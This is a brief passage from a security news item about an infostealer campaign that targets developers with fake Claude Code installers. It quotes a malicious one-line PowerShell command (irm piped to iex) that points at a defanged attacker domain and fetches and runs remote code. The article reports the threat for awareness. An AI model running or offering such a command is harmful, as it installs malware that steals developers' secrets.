An ongoing campaign steals developers secrets via fake Claude Code installers and other popular coding tools, according to Ontinues security researchers. The lure as with several other infostealer attacks targeting developers over the past several months mimics a legitimate one line installer for an attacker controlled command. In this case, the command is “irm https[:] claude[.]ai install.ps1 | iex”, and the lure replaced the destination host with “irm events[.]msft23[.]com | iex”. The...
